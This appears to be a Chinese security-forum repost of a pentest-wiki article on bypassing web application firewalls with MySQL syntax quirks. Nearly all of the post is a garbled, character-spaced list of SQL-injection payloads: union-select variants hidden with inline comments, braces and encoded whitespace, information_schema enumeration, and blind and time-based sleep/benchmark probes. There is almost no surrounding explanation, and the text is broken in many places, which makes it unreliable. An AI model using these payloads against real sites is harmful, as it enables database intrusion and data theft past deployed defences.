设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 数据库 [890] 2019-01-09_WAFBypass数据库特性(Mysql探索篇) ...
返回列表 发新帖
查看: 7|回复: 0

[890] 2019-01-09_WAFBypass数据库特性(Mysql探索篇)

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 7 天前 | 显示全部楼层 |阅读模式
2019-01-09_WAFBypass数据库特性(Mysql探索篇) W A F   B y p a s s M y s q l   B y p a s s   B y p a s s   2 0 1 9 - 0 1 - 0 9   # W A F   , 9 0 x 0 1   W A F M y s q l   / * ! 1 2 3 4 5 u n i o n * / s e l e c t M y s q l :   s e l e c t { x   u s e r } f r o m { x   m y s q l . u s e r } ; : % 2 3 % 0 a % 2 d % 2 d % 0 a W A F 0 x 0 2   5       S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1 u n i o n s e l e c t 1 , u s e r ( ) f r o m a d m i n u n i o n ( 1 ) ( 2 ) M y s q l ( 3 )   1 . 1 % 1 % 2 e % 2 % 2 e ( 4 ) 1 E 0 / * * / / * ! 5 0 0 0 0 u n i o n * / S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n / * * / s e l e c t   1 , u s e r ( )   f r o m   a d m i n % 0 9 , % 0 a , % 0 b , % 0 c , % 0 d , % 2 0 , % a 0 i d = 1 % 0 a u n i o n   s e l e c t   1 , u s e r ( )   f r o m   a d m i n % 1 % 2 0 % 3 9 2 0 % 4 0 % 2 0 % 2 3 % 0 a % 2 d % 2 d % 0 a S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1 . 0 u n i o n   s e l e c t   1 , u s e r ( )   f r o m   a d m i n S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1 . u n i o n   s e l e c t   1 , u s e r ( )   f r o m   a d m i n
( 5 )   N u n i o n u n i o n s e l e c t ( 1 ) ( 2 ) 使 M Y S Q L ( 3 ) S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   = 1   u n i o n ( s e l e c t   ' t e s t ' , ( s e l e c t   u s e r ( )   f r o m   a d m i n   l i m i t   0 , 1 ) ) s e l e c t   *   f r o m   a d m i n   u n i o n ( s e l e c t   ' t e s t ' , ( s e l e c t   ' a s d ' ) , ( s e l e c t   u s e r ( )   f r o m   u s e r s   l i m i t   0 , 1 ) ) s e l e c t ( 1 ) M y s q l % 0 9 , % 0 a , % 0 b , % 0 c , % 0 d , % 2 0 , % a 0 i d = 1   u n i o n   s e l e c t % 0 9 1 , u s e r ( )   f r o m   a d m i n ( 2 ) 使 M Y S Q L ( 3 ) % 2 1       % 2 b     +     % 2 d     -     % 4 0     @     % 7 e       ~     S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t ~ 1 , u s e r ( )   f r o m   a d m i n   S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1 E 0 u n i o n   s e l e c t   1 , u s e r ( )   f r o m   a d m i n S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   N u n i o n   s e l e c t   1 , u s e r ( )   f r o m   a d m i n M y s q l % 0 9 , % 0 a , % 0 b , % 0 c , % 0 d , % 2 0 , % a 0 i d = 1   u n i o n % a 0 s e l e c t   1 , u s e r ( )   f r o m   a d m i n / * * /   / * a n y t h i n g * / / * * / / * a n y t h i n g * /
( 4 )     S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t ( 1 ) , u s e r ( )   f r o m   a d m i n       S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   / ! 1 2 3 4 5 s e l e c t / 1 , u s e r ( )   f r o m   a d m i n   @ S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t @ , u s e r ( )   f r o m   a d m i n   { S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t   { x   1 } , u s e r ( )   f r o m   a d m i n     S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t " 1 " , u s e r ( )   f r o m   a d m i n   N         S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t N , u s e r ( )   f r o m   a d m i n   f r o m ( 1 ) M y s q l % 0 9 , % 0 a , % 0 b , % 0 c , % 0 d , % 2 0 , % a 0 i d = 1   u n i o n   s e l e c t   1 , u s e r ( ) % 0 9 f r o m   a d m i n ( 2 ) 使 M Y S Q L ( 3 ) % 6 0   S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n ( s e l e c t   1 , ( s e l e c t   f r o m   i n f o r m a t i o n _ s c h e m a . S C H E M A T A   l i m i t   0 , 1 ) )                                       S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t   1 , u s e r ( ) ` f r o m   a d m i n   S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n ( s e l e c t   1 , ( s e l e c t / ! s c h e m a _ n a m e / f r o m   i n f o r m a t i o n _ s c h e m a . S C H E M A T A   l i m i t   1 , 1 ) ) {           S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n ( s e l e c t   1 , ( s e l e c t { x   s c h e m a _ n a m e } f r o m   i n f o r m a t i o n _ s c h e m a . S C H E M A T A   l i m i t   1 , 1 ) )             S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n ( s e l e c t   1 , ( s e l e c t ( s c h e m a _ n a m e ) f r o m   i n f o r m a t i o n _ s c h e m a . S C H E M A T A   l i m i t   1 , 1 ) ) :           S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t   1 , u s e r ( ) " " f r o m   a d m i n 1 / * * /   / * a n y t h i n g * / s c h e m a _ n a m e
S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t   1 , u s e r ( ) A   f r o m   a d m i n       S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t   1 , u s e r ( ) ` b f r o m   a d m i n   ( 4 ) 1 E 0 N i d = 1   u n i o n % 0 c s e l e c t   u s e r ( ) , 2 . 0 f r o m   a d m i n S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n s e l e c t   u s e r ( ) , 2 . 0 f r o m   a d m i n S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t   u s e r ( ) , 8 e 0 f r o m   a d m i n S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t   u s e r ( ) , N f r o m   a d m i n f r o m ( 1 ) M y s q l % 0 9 , % 0 a , % 0 b , % 0 c , % 0 d , % 2 0 , % a 0 i d = 1   u n i o n   s e l e c t   1 , u s e r ( ) % 0 9 f r o m   a d m i n ( 2 ) 使 M Y S Q L ( 3 )             i d = 1   u n i o n   s e l e c t   1 , ( s e l e c t ( s c h e m a _ n a m e ) f r o m . S C H E M A T A   l i m i t   0 , 1 )       i d = 1   u n i o n   s e l e c t   1 , ( s e l e c t ( s c h e m a _ n a m e ) f r o m / ! 1 2 3 4 5 i n f o r m a t i o n _ s c h e m a . S C H E M A T A /   l i m i t   0 , 1 ) {             i d = 1   u n i o n   s e l e c t   1 , ( s e l e c t ( s c h e m a _ n a m e ) f r o m   { x   i n f o r m a t i o n _ s c h e m a . S C H E M A T A }   l i m i t   0 , 1 )                 i d = 1   u n i o n   s e l e c t   1 , ( s e l e c t ( s c h e m a _ n a m e ) f r o m ( i n f o r m a t i o n _ s c h e m a . S C H E M A T A )   l i m i t   0 , 1 ) S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t   1 , u s e r ( )   f r o m 1 2 3 a s d a d m i n   0 x 0 3   ( 1 ) M i d ( v e r s i o n ( ) , 1 , 1 ) S u b s t r ( v e r s i o n ( ) , 1 , 1 ) / * * / / * a n y t h i n g * / i n f o r m a t i o n _ s c h e m a
S u b s t r i n g ( v e r s i o n ( ) , 1 , 1 ) L p a d ( v e r s i o n ( ) , 1 , 1 ) R p a d ( v e r s i o n ( ) , 1 , 1 ) L e f t ( v e r s i o n ( ) , 1 ) r e v e r s e ( r i g h t ( r e v e r s e ( v e r s i o n ( ) ) , 1 ) )   ( 2 ) c o n c a t ( v e r s i o n ( ) , ' | ' , u s e r ( ) ) ; c o n c a t _ w s ( ' | ' , 1 , 2 , 3 ) ( 3 )   A s c i i ( 1 )   w a f 使 a s c i i   ( 1 )   C h a r ( 4 9 )   H e x ( a )   U n h e x ( 6 1 ) ( 1 ) l i m i t   l i m i t   1   o f f s e t   0 ( 2 )   m i d   m i d ( v e r s i o n ( )   f r o m   1   f o r   1 ) ( 3 ) u n i o n   j o i n S E L E C T   *   F R O M   a d m i n   W H E R E   u s e r n a m e   =   1   u n i o n   s e l e c t   *   f r o m   ( s e l e c t   1 ) a   j o i n ( s e l e c t { x   s c h e m a _ n a m e }   f r o m   i n f o r m a t i o n _ s c h e m a . S C H E M A T A   l i m i t   1 , 1 ) b   ( 4 ) < > s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 1   a n d   a s c i i ( s u b s t r ( d a t a b a s e ( ) , 0 , 1 ) ) > 6 4 使 , 使 g r e a t e s t g r e a t e s t ( n 1 , n 2 , n 3 , ) ( n 1 , n 2 , n 3 , ) s q l 使 g r e a t e s t : s e l e c t   *   f r o m   u s e r s   w h e r e   i d = 1   a n d   g r e a t e s t ( a s c i i ( s u b s t r ( d a t a b a s e ( ) , 0 , 1 ) ) , 6 4 ) = 6 4 使 g r e a t e s t ( ) 1   s l e e p ( 5 ) / b e n c h m a r k ( 1 0 0 0 0 0 0 0 , S H A 1 ( 1 ) ) i d = 1   x o r   s l e e p % 2 3 % 0 a ( 5 ) i d = 1   x o r   s l e e p % 2 d % 2 d % 0 a ( 5 ) i d = 1   x o r   s l e e p ( [ % 2 0 ] 5 ) i d = 1   x o r   b e n c h m a r k % 0 a ( 1 0 0 0 0 0 0 0 , S H A 1 ( 1 ) )
  M y s q l % 0 9 , % 0 a , % 0 b , % 0 c , % 0 d , % 2 0 , % a 0 ( 2 ) s e l e c t   { x   1 } s e l e c t { x [ ] 1 } M y s q l % 0 9 , % 0 a , % 0 b , % 0 c , % 0 d , % 2 0 , % a 0 % 2 1           % 2 b       +               % 2 d       -         % 4 0     @             % 7 e   ~ 0 x 0 4   E N D   M y s q l 姿 便 B y p a s s A b o u t   M e W A F i d = 1   x o r   s l e e p [ ] ( 5 )
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 10:21 , Processed in 0.148063 second(s), 30 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表